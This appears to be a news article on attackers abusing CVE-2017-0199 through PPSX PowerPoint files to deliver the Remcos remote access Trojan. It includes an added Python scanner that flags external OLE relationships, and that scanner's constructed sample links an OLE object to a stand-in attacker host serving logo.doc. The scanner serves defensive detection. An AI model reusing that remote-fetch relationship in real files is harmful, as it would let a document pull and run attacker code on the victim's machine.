Microsoft PowerPoint exploit used to bypass antivirus and spread malware

It's the first time this exploit has been used to target PowerPoint users -- and it's being used to distribute powerful Trojan malware, say researchers.
Written by Danny Palmer, Senior Writer

Cyberattackers are exploiting a vulnerability that allows them to evade detection by antivirus software and deliver malware via Microsoft PowerPoint.

The flaw in the Windows Object Linking and Embedding (OLE) interface is being used by attackers to distribute malicious Microsoft Office files.

The exploit is commonly used to deliver infected Rich Text File (.RTF) documents, but cybersecurity researchers at Trend Micro have spotted attackers using it to compromise PowerPoint slideshow files for the first time.

As with many hacking campaigns, this attack begins with a spear-phishing email. The message purports to be from a cable manufacturing provider and mainly targets organisations in the electronics manufacturing industry.

The sender's address is disguised to look like a message from a business partner and the email appears to relate to an order request, with an attachment purportedly containing shipping information.

Phishing email used to distribute malware via PowerPoint. Image: Trend Micro

However, the attachment is useless to the recipient: it contains a malicious PowerPoint Show which, when opened, simply displays the text 'CVE-2017-8570', a reference to a different Microsoft Office vulnerability than the one actually used in this attack.

The malicious file triggers an exploit for the CVE-2017-0199 vulnerability, which initialises the infection process. As a result, malicious code is run using the PowerPoint Show animations feature, which downloads a document named logo.doc.

This downloaded logo.doc contains XML and JavaScript code, which runs PowerShell to execute a file called 'RATMAN.EXE', a Trojanised version of the Remcos remote access tool, which then connects to a command and control server.

Once up and running on a system, Remcos is capable of many criminal operations, with compromised machines at risk from keylogging, screenlogging, webcam and microphone recorders, and the downloading and execution of additional malware. Ultimately, it can give the attacker almost full control over the infected machine without the owner being aware.

Researchers note that the sample behind this attack uses a .NET protector, which applies several protections and obfuscations to make it harder for researchers to reverse engineer. That indicates skill on the part of the attackers, suggesting this isn't an amateur campaign.

Critically, since most methods of detecting exploitation of CVE-2017-0199 focus on the RTF attack method, using a PPSX PowerPoint Show file as the attack vector lets the attackers package the malware so that it slips past antivirus detection tuned for the RTF variant.
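One way a defender can cover the PPSX vector described above, as a Python example added here (not code from Trend Micro or the article): a PPSX file is an Office Open XML zip, so a scanner can list every relationship marked TargetMode="External" and flag the non-hyperlink ones (such as an embedded OLE object) that point at a remote URL. The sample package, its .rels part and the URL in it are constructed for this example, and the assumption is that the remote reference is expressed as an OOXML relationship rather than hidden elsewhere.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Standard OOXML namespaces: package relationships and Office relationship types
PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

def find_external_relationships(ppsx_bytes):
    """Return (part, short type, target) for every External relationship."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(ppsx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue  # only .rels parts carry external targets
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{PKG_NS}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    findings.append((name, short_type, rel.get("Target", "")))
    return findings

def suspicious_relationships(findings):
    """Ordinary decks contain external hyperlinks; flag only non-hyperlink
    relationships (e.g. oleObject) whose target is a remote URL."""
    return [f for f in findings
            if f[1] != "hyperlink"
            and f[2].lower().startswith(("http://", "https://"))]

def build_sample_ppsx(rels_xml):
    """Minimal PPSX-shaped zip around one slide .rels part (constructed input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("ppt/slides/slide1.xml", "<sld/>")
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels_xml)
    return buf.getvalue()

# Constructed .rels part: one benign hyperlink plus an OLE object pulling a
# remote document. The URL is a placeholder, not an indicator from the article.
SAMPLE_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{PKG_NS}">
  <Relationship Id="rId1" Type="{OFFICE_REL}/hyperlink"
      Target="https://example.com/" TargetMode="External"/>
  <Relationship Id="rId2" Type="{OFFICE_REL}/oleObject"
      Target="http://attacker.invalid/logo.doc" TargetMode="External"/>
</Relationships>"""
```

Running the two functions over `build_sample_ppsx(SAMPLE_RELS)` reports only the oleObject relationship, while the ordinary hyperlink is ignored; the same check applies unchanged to DOCX and XLSX packages.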

Fortunately, there's a way to completely avoid becoming a victim of this particular attack: Microsoft released patches addressing the vulnerability in April, and any system updated with them is safe from this attack.

Nonetheless, users need to remain alert to the risks posed by legitimate-looking phishing emails.

"Cases like this highlight the need for users to be cautious when opening files or clicking links in their emails--even if they come from seemingly legitimate sources. Spear phishing attempts can be rather sophisticated, and as seen with this example, can trick most users into downloading malicious files," wrote Trend Micro researchers Ronnie Giagone and Rubio Wu.

There are various techniques organisations can use to defend themselves against these attacks, with education of staff playing a key role.
